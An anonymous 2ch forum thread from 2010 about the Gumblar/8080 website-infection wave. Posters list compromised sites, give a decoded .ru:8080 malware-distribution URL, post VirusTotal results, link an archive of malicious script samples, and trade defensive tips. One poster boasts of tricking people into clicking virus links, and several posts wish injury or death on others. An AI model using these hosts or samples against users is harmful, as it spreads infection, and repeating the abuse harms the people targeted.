360 :名無しさん@お腹いっぱい。:2010/03/23(火) 06:12:27
>>359
↑踏んじゃった人必死だなー
いくらふぁびょっても誰も逮捕されないから
結局お前は泣き寝入りするしかないのであーるw

361 :名無しさん@お腹いっぱい。:2010/03/23(火) 06:32:29
犯罪者の弁
「こんなことで捕まるとは思ってなかった」

362 :名無しさん@お腹いっぱい。:2010/03/23(火) 09:26:14
こんなアホでも捕まってくれると良いけどね

363 :名無しさん@お腹いっぱい。:2010/03/23(火) 10:06:39
>>339

お前、空しくならないか?

364 :名無しさん@お腹いっぱい。:2010/03/23(火) 10:54:20
轢かれるとかで半身不随になってPCさわれなくなるのが望ましい。
もちろん貰いの貧乏事故で。

365 :名無しさん@お腹いっぱい。:2010/03/23(火) 14:47:02
いまさらだが
>>263ってwindows7のultimateなのに、
DEP切って、applockerも使ってないの?
ultimateいらねぇじゃん
home にしてしまえw


366 :名無しさん@お腹いっぱい。:2010/03/23(火) 15:12:28
Java Runtime Environment なんて>>3見て初めて知ったんですけど
これって皆さんやはりインストールしているのでしょうか・・・?
>>3の(1)〜(3)までは実行してあったのですが もしかしたらこの状態だと覗いただけで感染してしまってたのでしょうか?


367 :名無しさん@お腹いっぱい。:2010/03/23(火) 15:45:57
てんぷらよみなおせ

368 :名無しさん@お腹いっぱい。:2010/03/23(火) 18:29:37
249-253まで凸完了


369 :名無しさん@お腹いっぱい。:2010/03/23(火) 18:50:33
www●e-kudamono●co●jp/
googlでは引っかからないけどaguseではTrojan-Clicker.JS.Agent.mz


370 :名無しさん@お腹いっぱい。:2010/03/23(火) 19:03:33
>>369
>>252

371 :名無しさん@お腹いっぱい。:2010/03/23(火) 19:22:47
ウイルス作成は儲かるとか、ガンブラーを作ったチームは、一人一千万貰ったとかですが
それでも、一年に一回か二回は仕事をする必要があるんじゃないのかなー、と思うのです。

去年は、3月、10月、12月かな?
感染者がゼロからのスタートでご存知の通りの事態です。

次回は、残存感染サイト数、残存感染PC数から
更に鼠算式に拡大するのでしょうか。
ウイルスも差し替えられるのでしょうか。

出来れば、残存感染サイト数、残存感染PC数をゼロに近づけたいのですが
いろいろと限界があるのです。。。


372 :名無しさん@お腹いっぱい。:2010/03/23(火) 19:29:50
文章書いてみたけど、書くことは何も無かった
って感じですね

373 :名無しさん@お腹いっぱい。:2010/03/23(火) 19:58:47
勘違いもひどいし何が言いたいのか分からない
すごい文章だ

374 :名無しさん@お腹いっぱい。:2010/03/23(火) 20:16:39
このスレも荒れてきたな・・・

所でこれもガンブラーだよな?
eroquis●s1●freexy●net/

375 :名無しさん@お腹いっぱい。:2010/03/23(火) 20:20:32
>>374
お前眼科行ったほういいよ

376 :名無しさん@お腹いっぱい。:2010/03/23(火) 20:30:34
>>375
ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://eroquis.s1.freexy.net/


377 :名無しさん@お腹いっぱい。:2010/03/23(火) 22:37:49
>>376
ソースも確認出来ないチキンなの?

378 :名無しさん@お腹いっぱい。:2010/03/23(火) 22:53:36
aisyw●com

379 :名無しさん@お腹いっぱい。:2010/03/23(火) 22:57:33
>>377
>ただいま移転作業中につき閉鎖しています
>近日中にこのページも削除されますので、ご了承下さい
んで>>367

>>377
今は、改竄に気が付いて対応した後でコードはないが
>>347が発見した時にコードは有ったのかも知れない
>>367からもにコードは有ったのは確か

目で見える物の背後にある、目では見えない真実を読む事も大切なのじゃw

380 :名無しさん@お腹いっぱい。:2010/03/24(水) 00:56:39
> 目で見える物の背後にある、目では見えない真実を読む事も大切なのじゃw

>>367」をいちいち「>>376」と読み替えなきゃならないのもやっぱその類ですか?

381 :名無しさん@お腹いっぱい。:2010/03/24(水) 01:45:59
>374
っていうか俺そのサイトよく訪れてたんですけど・・・
仮にgumblarに感染しているサイト訪れてたとしたら、自分がgumblarを伝染する事もありえるのでしょうか?
その場合感染しているかどうか調べる方法はないのでしょうか?心配になってきた・・

382 :名無しさん@お腹いっぱい。:2010/03/24(水) 07:15:07
>>381
サイトが改ざんされた=Gumblar系列のウィルスを呼び出すスクリプトが埋め込まれた
とは限らないよ。

サイトの管理人もなにが置いてあったのか把握してないみたいだし
PCキレイにしたのかどうかもブログの文章からは判断できない。
特定するのは難しいんじゃない?

>感染しているサイト訪れてたとしたら、自分がgumblarを伝染する事も
使ってるPCに脆弱性が残ってるなら感染するだろうね

「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html

383 :名無しさん@お腹いっぱい。:2010/03/24(水) 15:38:02
とうとう警視庁が動き出したようだな
むしろ遅すぎたが

384 :名無しさん@お腹いっぱい。:2010/03/24(水) 15:58:49
ガンブラー問題でフランスなどに国際捜査協力を要請 海外5カ国のサーバ悪用 警視庁 [03/23]
http://yutori7.2ch.net/test/read.cgi/liveplus/1269320563/

【ネット】警視庁がガンブラー問題でフランスなどに国際捜査協力を要請 海外5カ国のサーバ悪用
http://tsushima.2ch.net/test/read.cgi/newsplus/1269327240/

385 :名無しさん@お腹いっぱい。:2010/03/24(水) 16:20:08
とりあえずWindowsやアドビとかの脆弱性を全部埋めてセキュリティソフトを常に最新に保ち
常駐ソフト以外にもスパイボットとか入れてruとかのドメイン全部弾いて
Webブラウザ等を仮想化する

こんなもん?
出来ればCドライブ自体仮想化してしまえば何の心配もないんだろうけどな

386 :名無しさん@お腹いっぱい。:2010/03/25(木) 00:47:12
スレチすまん。
ガンブラー系ではないかもしれないが、「igqjj.exe」ってのにやられてしまい今駆除中。
ググッても英文のサイトしか無く、情報少。誰か駆除できた方いませんか?

その英文のサイトにあった「Superなんとか」って言うソフトで駆除しているけど、どこを見てもそのソフトしか出てこない。
新種なのか?

で、感染源はどうやら「チュートリアルDVDの断片」らしい。英語で解説している(DL物)物だが、「まあ雰囲気で解るだろう」と
空けたのが間違いでそれに仕掛けてあったのか、乗ってきたのか定かではない。が、そのDL物ファイルを開けただけでは
見られないもので、アドレスやら何やら登録しないと始まらない仕様。

適当に架空の個人情報を入力し「サブミット」。たしかに映像は始まったが15分もしないうちにPCの挙動がおかしくなり
CORE2 が「フリーズ」。初めてフリーズしたところを このマシンでみた。 うかつだった。

情報ありましたら、よろしくお願いします。重ねてスレチ、すみません。

387 :名無しさん@お腹いっぱい。:2010/03/25(木) 01:09:04
こっちいk

【ウィルス情報質問 総合スレッド★Part47】@セキュリティ
http://pc11.2ch.net/test/read.cgi/sec/1244633881/l50


388 :名無しさん@お腹いっぱい。:2010/03/25(木) 01:14:54
>>386
スレチだと思うなら該当スレ探せよ
セキュ板に辿りつけたならわかるだろ

そもそも後半は何言ってるかわからん

389 :名無しさん@お腹いっぱい。:2010/03/25(木) 09:29:09
>DL物ファイルを開けただけでは見られないもので、アドレスやら何やら登録しないと始まらない
例の暴露ウィルスと似てるなw



390 :名無しさん@お腹いっぱい。:2010/03/25(木) 12:24:57
ホームページもってないひとは感染しても気がつきにくいかもな

391 :名無しさん@お腹いっぱい。:2010/03/25(木) 16:13:12
>>390
そうそう
っていうか現時点での確認方法は各アンチウイルスソフトによるスキャンしかないのかな?
検出しない所が多いみたいだけどさ

392 :名無しさん@お腹いっぱい。:2010/03/25(木) 19:06:01
感染したら色々ぶち込まれるみたいだから大元の本体は無理でも何かしら拾えないのか?>スキャン

393 :名無しさん@お腹いっぱい。:2010/03/25(木) 19:13:51
偽セキュリティソフトが落とされたりすれば嫌でもわかるな

394 :名無しさん@お腹いっぱい。:2010/03/25(木) 20:31:30
音素材サイト『ザ・マッチメイカァズ』がウイルス感染で閉鎖の危機
http://tsushima.2ch.net/test/read.cgi/news/1269516555/

395 :あんちたった:2010/03/25(木) 20:57:23
>>394
マジかよ・・・

396 :名無しさん@お腹いっぱい。:2010/03/25(木) 21:05:14
>>394
ちょww
マジで?

397 :名無しさん@お腹いっぱい。:2010/03/25(木) 21:51:54
www●doomkeikaku●co●jp
株式会社レジナのホスティングが多すぎ

398 :名無しさん@お腹いっぱい。:2010/03/25(木) 22:30:58
/.sys/?action=
っつーコードが複数サイトでインジェクションされてるってとあるサイトで見たんだが
どういうこったい

399 :名無しさん@お腹いっぱい。:2010/03/26(金) 01:04:38
8080は強姦してくれるからわかりやすい
xは気がつかない人は一生気がつかないかも

400 :名無しさん@お腹いっぱい。:2010/03/26(金) 02:36:33
8080はxmlrpc.phpにもつくのか…

401 :コテハン:2010/03/26(金) 11:10:57
【陥落サイトのURL悪用厳禁】
www●net-fukui●jp
www●doomkeikaku●co●jp/
seo●19th●org/
www●commentsexy●com/ ←ハニートラップwww

現在の最新型は
("repl"+"XXXace".substr(Y))
これが含んでるっぽい

402 :名無しさん@お腹いっぱい。:2010/03/26(金) 13:22:57
>>401
1番目と3番目の文法ミスってどうしておこるの?

403 :コテハン:2010/03/26(金) 14:02:34
>>402
作者に聞いてみないとわからないのでござる

404 :名無しさん@お腹いっぱい。:2010/03/26(金) 14:05:52
>>401
上から順番に挿入部分だけ切り取ったスキャン結果どえ〜す
http://www.virustotal.com/jp/analisis/f7f75291ac95974de042295fddf9d17139acb088e5c7ddc1667a1244734e663c-1269577456
http://www.virustotal.com/jp/analisis/a5a170b4b43ce59dd76fbbef94fdf1a43bb12702f0716fda3aa48858023969d7-1269579080
http://www.virustotal.com/jp/analisis/057c1e463e53505366f4bd867346d2f7670405b447878a03adec8767f43a382a-1269577469
http://www.virustotal.com/jp/analisis/aca202528b5641f31eaae33a58287c4a6ecf791f5310b7266a86e603a8bf1838-1269577474
Avastが4/4
AVGが2/4
McAfeeが3/4
TrendMicro4/4
カスペルはVerの都合でヒューリスティック表記出ず
ノートンはドライブバイダウンロード阻止
いずれも4/4
こんなとこですかね〜

405 :404:2010/03/26(金) 14:20:34
http://www1.axfc.net/uploader/Sc/so/96625.zip
一応4ファイル入りです
パスnews

406 :コテハン:2010/03/26(金) 17:31:06
【陥落サイトのURL悪用厳禁】
www●sankiblast●co●jp/ ←新型きたー

現在、発掘作業中・・・

407 :コテハン:2010/03/26(金) 17:55:05
【陥落サイトのURL悪用厳禁】
www●coaster-ya●com/
www●soul-wave●jp/MAME/
j-news●net/
discussanctuary●com/main●php ←!

www●daini-survey●com/
www●daini-survey●com/xmlrpc●php ←!

harappa-h●org/
harappa-h●org/AtoZ/modules/popnupblog/rss●php ←!

ががが・・・

408 :U.F.O ◆U.F.OnbYNA :2010/03/26(金) 18:20:00
>>407
これも新種なの・・・か?

jニュースが・・・

409 :コテハン:2010/03/26(金) 18:22:47
net-fukuiとdoomkeikaku
逃げるの早すぎてワロタwww

410 :コテハン:2010/03/26(金) 18:33:05
>>408
「ただいま絶賛更新中」みたい

あとは・・・
http://search.yahoo.co.jp/search?p=%22%3Cscript%3Evar%22+%22new+String%28%29%3B%22+%22new+Date%28%29%3B%22+%22new+Array%28%29%3B%22+-JAVA+-JAVAScript&ei=UTF-8&fr=top_ga1_sa&x=wrt&meta=fl%3D3
検索結果を見てくれ

411 :U.F.O ◆U.F.OnbYNA :2010/03/26(金) 18:37:49
>>410
よく覗いてたあのサイトも感染ったとは・・・

そのタグが新種か・・・
あとphpが多いけどドメイン範囲でphp感染してる?

412 :名無しさん@お腹いっぱい。:2010/03/26(金) 18:45:10
最悪だな…もうどうにもならないんだね
1年も終息に向かわないなんて…
本当にこれの犯人は死刑では済まされないな
一日でも捕まる事を祈るしかないか…
ここまで新種が出たりして
ロシアンルーレット状態のネットなんかやりたくないよ…もう嫌だ

413 :名無しさん@お腹いっぱい。:2010/03/26(金) 18:58:56
これじゃちょんぎって聖職者になるしかない

414 :コテハン:2010/03/26(金) 20:26:02
【陥落サイトのURL悪用厳禁】
j-news●net/だが・・・
include/external●js
/include/xoops●js
この2つもやられてた。

あと、デコード後のURLは
news-com-au●priceminister●com●timesonline-co-uk●TheSuperPager●ru:
8080
/5d6d●com/5d6d●com/rian●ru/homeway●com●cn/google●com●php
これで良いのかな?


>>411 陥落サイト=感染したPCの中の情報次第。


415 :名無しさん@お腹いっぱい。:2010/03/26(金) 20:47:53
>>404
Avira&MSE使えねー

416 :名無しさん@お腹いっぱい。:2010/03/26(金) 21:01:07
AVGにしていて良かったと思ったら感染しそうで怖い。
ってかスペインかどっかで捕まったウィルス作成グループは
どうなったの?

417 :名無しさん@お腹いっぱい。:2010/03/26(金) 21:04:43
Aviraは現物対応だからスクリプトでは無理。

418 :名無しさん@お腹いっぱい。:2010/03/26(金) 21:16:00
なんだかんだで ru:8080/ もしくは :8080/ をURLブロックするのが一番楽?

419 :名無しさん@お腹いっぱい。:2010/03/26(金) 22:02:33
:8080ごとブロックはやめとけ

420 :名無しさん@お腹いっぱい。:2010/03/26(金) 22:06:03
>>416
あれは作者じゃなくてそれを買ってるユーザーだったような

421 :名無しさん@お腹いっぱい。:2010/03/26(金) 22:09:29
>>420
そうなんだ。まぁ、ユーザー捕まえるのだけでも
意味あるかもね

422 :名無しさん@お腹いっぱい。:2010/03/26(金) 22:26:11
>>415,417

ん?
JS/Redirector.KA KA.1 KA.2 KA.3
として検出されてますが?

423 :名無しさん@お腹いっぱい。:2010/03/26(金) 22:39:05
virustotalで検出できない判定食らわされたからって現物のソフトが絶対検出できないって訳じゃない
virustotalでの検出可否は参考程度と思っといた方が良い

でも安心しちゃダメよ

424 :名無しさん@お腹いっぱい。:2010/03/26(金) 23:10:13
.ruドメインの登録手続きが厳格化されるみたいだけど
そうなると.ru:8080が通用しなくなるのかな?
4月1日からだって

ロシアの「.ru」ドメインの登録手続きが厳格化へ――サイバー犯罪の防止がねらい
http://www.computerworld.jp/topics/vs/177469.html

425 :名無しさん@お腹いっぱい。:2010/03/26(金) 23:16:20
.cn、.ruの次はどこが標的にされるでしょうね?

426 :名無しさん@お腹いっぱい。:2010/03/26(金) 23:31:40
まさかの.jp

427 :名無しさん@お腹いっぱい。:2010/03/26(金) 23:32:30
本家のlv(ラトビア)じゃないか?

428 :名無しさん@お腹いっぱい。:2010/03/27(土) 00:09:53
>>427
なぜラトビアが本家?

429 :名無しさん@お腹いっぱい。:2010/03/27(土) 01:03:08
>>414
http://www.virustotal.com/jp/analisis/6a96fbd33ce7b4e127b82050a7d64987b348b5b5c1451050b9bc5386c601a823-1269619137
結果: 1/42 (2.39%)
Jiangmin:Trojan/JS.Pegel.a

430 :名無しさん@お腹いっぱい。:2010/03/27(土) 02:09:44
Jnewsって編集長がtwitterやってなかったか?

431 :コテハン:2010/03/27(土) 18:35:26
【陥落サイトのURLは悪用厳禁】
※他スレへの転載は自己責任で行って下さい。
www●okagrate●com/
www●tirashi●jp/
www●e-proactive●com●hk/
relaxsize●com/

■センセイは最新型を絶賛スルー中
http://www.google.co.jp/search?hl=ja&q=%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3a%5Cx2f%5Cx2f%22&btnG=%E6%A4%9C%E7%B4%A2&lr=



432 :名無しさん@お腹いっぱい。:2010/03/27(土) 19:13:14
>>431
3〜4連発入ってるやつがいるな
どうやったらこんな連発になるんだか

433 :名無しさん@お腹いっぱい。:2010/03/27(土) 21:51:35
最近avastスレにここに報告されたアドレスが有用情報として貼られてます。しかもウイルス警告を否定する周到さ
既に2件確認済み

434 :名無しさん@お腹いっぱい。:2010/03/27(土) 22:55:52
だからどうしろと

"今のところ"は対策しとけば感染はしない。セキュ板覗くような人は当然ながらやってるだろ
アドレス貼って楽しんでるようなアホは相手にしたら余計に貼るよ

435 :名無しさん@お腹いっぱい。:2010/03/27(土) 23:03:25
安易にクリックしちゃうという行動もいかがなものかと思われるし
そういう人は痛い目見て学習したほうがいいんじゃないの

ウイルスサイト貼りを肯定はしないけどさ

436 :名無しさん@お腹いっぱい。:2010/03/27(土) 23:23:39
2ch内のURLを安易にクリックするなってのはセキュ板じゃなくても基本だろ
基本を忘れちゃいかんよ

437 :(VдV) ◆yUyb3Tqn92 :2010/03/28(日) 04:48:29
(V`д´V)うむ、だからこそ俺様がウィルスURLを踏ませていることはエロイこと!
じゃなくて偉いこと!俺様にウィルス踏まされた馬鹿は
その経験のおかげでネット上で簡単にURLを踏む事の危険性に気づくってわけだ!
(VдV)┌ まぁ本当の馬鹿は何回も引っかかるけどな。

つまり
(V`д´V)俺様は反面教師、いや、必要悪を買って出てるってわけさ!
そして、それが俺様の人気の秘訣でもあるわけだ(Vд^)−☆ いつもブログに応援ありがとうねみんな!


438 :名無しさん@お腹いっぱい。:2010/03/28(日) 06:37:53
禿の相手はしないように
これ基本な

439 :名無しさん@お腹いっぱい。:2010/03/28(日) 12:36:34
新潟ライブカメラ でなんかでた。

440 :名無しさん@お腹いっぱい。:2010/03/28(日) 14:02:38
ここって個人ブログ晒して平気?さっきとあるブログ見てたらガンブラーって言うウィルスをブロックしたってノートン先生が教えてくれた。
だけどガンブラーをチェックするサイトでチェックしても出てこない。自分のPCが悪いの?

441 :名無しさん@お腹いっぱい。:2010/03/28(日) 14:29:04
直接コード見て確認してからはるもんだろJK

442 :名無しさん@お腹いっぱい。:2010/03/28(日) 14:30:40
>>440
どのチェックサイトを使ったんだよ

443 :名無しさん@お腹いっぱい。:2010/03/28(日) 14:36:36
>>442
>>5のチェックサイト全部。
8080って奴だと思う。


444 :名無しさん@お腹いっぱい。:2010/03/28(日) 18:22:14
それならソースも見たってことだろ
それでないなら無いんじゃないの

445 :名無しさん@お腹いっぱい。:2010/03/28(日) 19:15:05
ノートンは何を見たんだ

446 :名無しさん@お腹いっぱい。:2010/03/28(日) 19:52:36
ノートンは誤検出するほど優秀でウイルスバスターは誤検出するザル

447 :名無しさん@お腹いっぱい。:2010/03/28(日) 20:08:55
更に、ソースネクストはウイルスバスター以下。

448 :名無しさん@お腹いっぱい。:2010/03/28(日) 21:02:19
>>446-447
ttp://all-freesoft.net/v-kensyutsu/v-kensyutsu.html
■AV-Comparativesによるランク
★★★ G DATA・AVIRA・TrsutPort・PC Tools・Symantec・F-Secure・ESET
    BitDefender・eScan・Avast・Kaspersky
★★  McAfee・Panda・Microsoft・Sophos・AVG
★   K7
ゼロ  Norman・Trend Micro・Kingsoft

バスターとKingは(以下略

449 :名無しさん@お腹いっぱい。:2010/03/28(日) 21:07:37
>>448
誤検知を考えてもK7の方が上という罠

450 :名無しさん@お腹いっぱい。:2010/03/29(月) 00:19:02
※ESETの防御率が4%しかない点を指摘された際の反論で、
ESET信者がセキュリティ板中に、VB100・AV-Comparatives・AV-Test.org等の
テスト結果コピペしていたのがバレてしまった瞬間。
http://pc11.2ch.net/test/read.cgi/sec/1207717191/47-49

451 :名無しさん@お腹いっぱい。:2010/03/29(月) 00:31:07
>>450
4%ってPFWのことだろ?
ttp://www.matousec.com/projects/proactive-security-challenge/results.php
1本でおkの統合型はザルが多いからなw

452 :名無しさん@お腹いっぱい。:2010/03/29(月) 00:46:21
ファイアウォールじゃなくてHIPSのテストだろ
いい加減気づけよ

453 :名無しさん@お腹いっぱい。:2010/03/29(月) 00:55:14
   (・∀・ )∀・ )
   と_,、⌒) )⌒) )  HIPSでーすイエーイ
     (_ ノノ_ ノノ

454 :名無しさん@お腹いっぱい。:2010/03/29(月) 04:57:00
このウィルス踏んじゃったときすぐリカバリしたのに
俺のサイトが改ざんされてた。どゆこと?

455 :名無しさん@お腹いっぱい。:2010/03/29(月) 05:02:02
踏んだ時にサイトのログインパスを抜かれたから要パス変更

456 :名無しさん@お腹いっぱい。:2010/03/29(月) 06:27:40

http://www.jnews.com/
http://relaxsize.com/

この二つはもうウィルスじゃなくね?
え?直リンするよ?文句ある?じゃ死ねば?

457 :名無しさん@お腹いっぱい。:2010/03/29(月) 08:04:10
オートコンプリート切ったらコンプリートされなくなったのでハゲです

458 :名無しさん@お腹いっぱい。:2010/03/29(月) 08:27:19
>>456
jnewsは直ってる
relaxsizeはまだ感染中

459 :名無しさん@お腹いっぱい。:2010/03/29(月) 08:45:03
感染してないよ

460 :名無しさん@お腹いっぱい。:2010/03/29(月) 09:20:32
>>460
今見たら直ってるな
キャッシュの罠か?

461 :コテハン:2010/03/29(月) 09:35:08
>>456
jnews.com/ぢゃなくてj-news.net/(苦笑)
で、そのj-news.net/から告知が出てた
ttp://www.j-news.net/infomation/


462 :名無しさん@お腹いっぱい。:2010/03/29(月) 10:08:58
IEのアドオンでShockwaveとAdobePDFLinkHelperは無効にしたほうがいいの?

463 :名無しさん@お腹いっぱい。:2010/03/29(月) 14:34:17
根本がわかってないやつはなにやってもムダ

464 :名無しさん@お腹いっぱい。:2010/03/29(月) 22:20:25
>>462
分からなかったらとりあえずアンインスコしとけ
どうせ使わんだろその辺

465 :名無しさん@お腹いっぱい。:2010/03/30(火) 02:43:58
>>461
>つきましては、以下ウィルスの内容や対処方法などを記述します。

ヲイヲイ、バスターで駆除して終わりかよ。
それで済むんなら、サイト閉鎖する必要無いだろうが

466 :名無しさん@お腹いっぱい。:2010/03/30(火) 03:01:43
>>465
だな。 告知してるだけ「マシ」ってとこかな?

■サイト改ざん猛威:感染パソコンの修復は「OSの再インストール」が近道
http://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=2166
>8080のの攻撃では
〜〜中略〜〜
感染パソコンを感染前の状態に戻すのは、ほとんど絶望的と考えるのが賢明だ。
感染が確認された場合には、必要なデータをバックアップし、
OSを再インストールするのが確実な方法といえるだろう。

これを貼れば良いのに・・・

467 :名無しさん@お腹いっぱい。:2010/03/30(火) 11:33:14
>>466
貼ったら貼ったで今度は一般人から非難続出だろうね。

468 :名無しさん@お腹いっぱい。:2010/03/30(火) 20:04:00
今となってはアップデートすらしない自分の方が過失の度合いは大きいけどね。

469 :名無しさん@お腹いっぱい。:2010/03/30(火) 22:02:05
216>>
mozilla add-ons の epdfを使っています。軽い。

470 :名無しさん@お腹いっぱい。:2010/03/30(火) 22:54:38
>>469
アンカーくらいちゃんと打ってください><

471 :名無しさん@お腹いっぱい。:2010/03/31(水) 00:30:59
470>>
は?なにいってんの
ちゃんとアンカされてるだろ

472 :名無しさん@お腹いっぱい。:2010/03/31(水) 00:35:04
特定の専ブラだと安価になるのかね

473 :名無しさん@お腹いっぱい。:2010/03/31(水) 00:51:54
その専ブラを知りたいね

474 :名無しさん@お腹いっぱい。:2010/03/31(水) 01:43:37
Janeなら
数字を左クリックで選択反転させ、右クリックすると安価先がPOPされる

安価の>や<はもともとああいう使い方もしたようだが
ここは2chなので

475 :名無しさん@お腹いっぱい。:2010/03/31(水) 01:48:21
こんな子供だましなウィルスに感染する奴って馬鹿なの?死ぬの?

476 :名無しさん@お腹いっぱい。:2010/03/31(水) 01:51:51
>>474
> 数字を左クリックで選択反転させ ×
数字を左ダブルクリックで選択反転させ ○



477 :名無しさん@お腹いっぱい。:2010/03/31(水) 04:12:57
今日JREの更新くるんだっけ

478 :名無しさん@お腹いっぱい。:2010/03/31(水) 04:16:47
もうきてる
ついでにIE8のセキュパッチもきてるぞ

479 :名無しさん@お腹いっぱい。:2010/03/31(水) 09:10:03
おい、こいつなんとかしてくれ

連日,相当 多数の皆さんが このページの駆除方法で
最低最悪のsecurity toolを駆除され,
再び 元通りにパソコンを使用出来たにも関わらず
ほとんどの皆さんから 何の喜びのメッセージをいただけません。
日本人の大人が,これほど礼儀知らずであったのでしょうか。
困っている場合に 手助けされる時,
お礼を言い合う習慣はなくなったのでしょうか。
                私は 因みに 現在 64歳です。

http://8.pro.tok2.com/~miyuki-net-school/index.html


480 :名無しさん@お腹いっぱい。:2010/03/31(水) 09:19:07
>479
前スレで出てたやつか
メールフォームから凸した人がいるが無視されてる

消去方法を削除してて、2000円払ったら教えるって書いてた時期もあった
間違いなく何言っても無駄だと思う

481 :名無しさん@お腹いっぱい。:2010/03/31(水) 09:34:58
古いかもしれないが、ねっとなんて、昔はサービスの塊のようなものでやっていたもの
だと思うがな

482 :名無しさん@お腹いっぱい。:2010/03/31(水) 10:29:57
金欲しいんだったら情報商材なんだからオークションで売れよw

483 :名無しさん@お腹いっぱい。:2010/03/31(水) 10:35:53
なんの反応もないのに、なんで駆除できたと分かるんだ?

484 :名無しさん@お腹いっぱい。:2010/03/31(水) 10:37:16
>>479
どんだけ上から目線なんだよwww


485 :名無しさん@お腹いっぱい。:2010/03/31(水) 10:40:19
>>479
ここって感染サイトだったの?

486 :名無しさん@お腹いっぱい。:2010/03/31(水) 11:20:58
>>479
今イロイロ見てたら、このおじちゃん他人のブログやらOKやらで自分の駆除方法書きまくりじゃん。


487 :名無しさん@お腹いっぱい。:2010/03/31(水) 11:23:01
そのうちここにも書いてきたりしてなw

488 :名無しさん@お腹いっぱい。:2010/03/31(水) 11:24:53
人に礼を求める奴にろくなのはいない

489 :名無しさん@お腹いっぱい。:2010/03/31(水) 11:44:24
私 金澤は 入会した翌日に 2円をゲットしました。
ささやかなお小遣いを希望される方に お奨めします。

490 :名無しさん@お腹いっぱい。:2010/03/31(水) 11:45:38
まさに老害

491 :名無しさん@お腹いっぱい。:2010/03/31(水) 11:59:43
>>479のジジイは偉そうなことを言ってるが、いい歳して自分が無防備である愚かさに気づいてないな・

492 :名無しさん@お腹いっぱい。:2010/03/31(水) 13:27:45
http://headlines.yahoo.co.jp/hl?a=20100330-00000011-zdn_ep-sci
日本のつぶやきでも起こりそうだよね・・・

493 :名無しさん@お腹いっぱい。:2010/03/31(水) 14:12:23
若干スレチだけど、JREとIE5〜8のアップデート来てます。


494 :名無しさん@お腹いっぱい。:2010/03/31(水) 16:24:36
>>479の御老人・・・終わってますな。
ネット上からサイトごと消滅した方がいいと思う。

クリーンインストール前提で、必要なファイルのバックアップを取る為
「とりあえずマトモに動かせるようにする」と言う意味での
security tool削除ならわからなくもないが・・・
本体を殺してないのに「完全駆除」とは片腹痛いw


495 :名無しさん@お腹いっぱい。:2010/03/31(水) 16:43:41
>>479
前半の日本語の意味が分からない
後半は驚いて何もいえない

496 :名無しさん@お腹いっぱい。:2010/03/31(水) 17:41:55
>>479
こういうやつはウイルス流してるヤツらと同類だな
謝罪の為に首吊って死ぬべきだ
いや死ぬことすら生ぬるい

497 :コテハン:2010/03/31(水) 21:21:10
【陥落サイトのURL悪用厳禁】
www●weekly-monthly●biz/

1件だけ投下・・・

498 :名無しさん@お腹いっぱい。:2010/03/31(水) 21:47:14
http://www.weekly-monthly.biz/

499 :名無しさん@お腹いっぱい。:2010/03/31(水) 22:29:20
>>497
http://www.virustotal.com/jp/analisis/ebd3266daa5efdc32cbf5c28e92ba44ee2e4b27e52bb7909e49961de400e45ac-1270040161
http://www.virustotal.com/jp/analisis/ebd3266daa5efdc32cbf5c28e92ba44ee2e4b27e52bb7909e49961de400e45ac-1270040347
>>497
電凸完了

500 :名無しさん@お腹いっぱい。:2010/03/31(水) 22:32:45
>>497
もう対策されてるわ〜。

501 :名無しさん@お腹いっぱい。:2010/04/01(木) 03:28:17
12/40
http://www.virustotal.com/jp/analisis/f67be411f07ae4c9cb814111cd622875b58c607e38d30b373e6d9224a59a7fd9-1270059337

07/37
http://www.virustotal.com/jp/analisis/7aea9859778fd62be387bf5e2ed5efc3126ae5f7e094461d39956371a7ea4954-1270059628

502 :コテハン ◆8080adndqg :2010/04/01(木) 11:31:03
【陥落サイトのURL悪用厳禁】
www●kadaru●mydns●to/ ←これやばくね?
www●jc-consulting●jp/ ←絶賛放置中
www●footsal-club●net/


503 :コテハン ◆8080adndqg :2010/04/01(木) 11:40:22
「site:www●kadaru●mydns●to」
www●google●co●jp/search?hl=ja&source=hp&q=site%3Awww●kadaru●mydns●to&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
先生は絶賛スルー中...


504 :コテハン ◆8080adndqg :2010/04/01(木) 13:23:51
【陥落サイトのURL悪用厳禁】
www●pokebai●net/



505 :名無しさん@お腹いっぱい。:2010/04/01(木) 13:25:17
【陥落サイトのURL悪用厳禁】
vip.6to23.com/jogman←ビックリサイトのトップだが感染確認

506 :コテハン ◆8080adndqg :2010/04/01(木) 14:29:59
>>505
"refresh"に5連発
.は●にしてほしいのです・・・
--
【陥落サイトのURL悪用厳禁】
www●ed-shop●com/
・Gumblarっぽいやつ
・<script>c10z27・・・
※めんどくさいから調べてない

ねる...

507 :名無しさん@お腹いっぱい。:2010/04/01(木) 14:44:02
>>505
これはどこの記載で確認できるの?

508 :名無しさん@お腹いっぱい。:2010/04/01(木) 16:53:55
ちょっと不便になるけどここまで来るとブラウザは常時仮想起動したほうがいいかな

509 :名無しさん@お腹いっぱい。:2010/04/01(木) 17:36:24
>>508
ブラクラ専用ノート作れ

510 :名無しさん@お腹いっぱい。:2010/04/01(木) 17:43:03
東原さんにガンブラーを話題にしてもらえば・・・

511 :名無しさん@お腹いっぱい。:2010/04/01(木) 17:52:25
東原ウィルスが拡散すると聞いて

512 :名無しさん@お腹いっぱい。:2010/04/01(木) 19:06:50
>>508
単純にJavascript切ればいいだけだアホ!

513 :名無しさん@お腹いっぱい。:2010/04/01(木) 19:31:59
>>501
AviraとMSEは地雷か

514 :名無しさん@お腹いっぱい。:2010/04/01(木) 20:20:00
>>512
そうNoScriptだな

515 :名無しさん@お腹いっぱい。:2010/04/01(木) 20:52:56
>>512 >>514
そして.htaccessを改ざんするタイプに引っかかって感染、と・・・

516 :名無しさん@お腹いっぱい。:2010/04/01(木) 21:09:49
.htaccessなんて表示されないのにどうやって防ぐのかと・・・

517 :名無しさん@お腹いっぱい。:2010/04/01(木) 21:51:17
リダイレクトを全遮断して、リダイレクト先を確認するようにすればいいだろう。
煩わしさが半端ないから、よほど意志が強くない限りは続けられないと思うが。

518 :名無しさん@お腹いっぱい。:2010/04/01(木) 22:36:46
>>517
まさにそれやってるけど大して煩わしさ感じない
そんなにリダイレクトしまくりなのか?

519 :名無しさん@お腹いっぱい。:2010/04/01(木) 22:43:37
13/42
